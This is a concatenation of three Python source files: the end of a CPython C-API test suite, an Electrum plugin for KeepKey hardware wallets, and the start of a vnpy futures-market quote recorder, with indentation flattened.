self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until the callback list has grown to n entries
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func):
code = textwrap.dedent('''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
obj = _testcapi.{func}()
error = (_testcapi.pyobject_is_freed(obj) == False)
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(int(error))
''')
code = code.format(func=func)
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_is_freed_uninitialized(self):
self.check_pyobject_is_freed('pyobject_uninitialized')
def test_pyobject_is_freed_forbidden_bytes(self):
self.check_pyobject_is_freed('pyobject_forbidden_bytes')
def test_pyobject_is_freed_free(self):
self.check_pyobject_is_freed('pyobject_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
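# A minimal sketch (not part of the plugin) of how address paths are composed
# before being expanded for the device: the keystore's derivation prefix plus
# a change/index pair, as in sign_message() and show_address() above. The
# derivation string here is only illustrative.
def _example_address_path(derivation="m/44'/0'/0'", change=0, index=7):
    return "%s/%d/%d" % (derivation, change, index)  # -> "m/44'/0'/0'/0/7"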
|
whole_markket_recorder.py
|
"""
Whole-market quote recording.
Reference: https://www.vnpy.com/forum/topic/3046-quan-shi-chang-lu-zhi-xing-qing-shu-ju
"""
import sys
import multiprocessing
import re
from contextlib import closing
from copy import copy
from copy import deepcopy
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, HistoryRequest, Product, TickData
from vnpy.trader.database import init
from vnpy.trader.setting import get_settings
from enum import Enum
from time import sleep
from datetime import datetime, time, timedelta
from logging import INFO
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.trader.utility import load_json, extract_vt_symbol
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
from vnpy.trader.event import EVENT_CONTRACT, EVENT_TICK
from vnpy.app.data_recorder.engine import RecorderEngine
EXCHANGE_LIST = [
Exchange.SHFE,
Exchange.DCE,
Exchange.CZCE,
Exchange.CFFEX,
Exchange.INE,
]
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
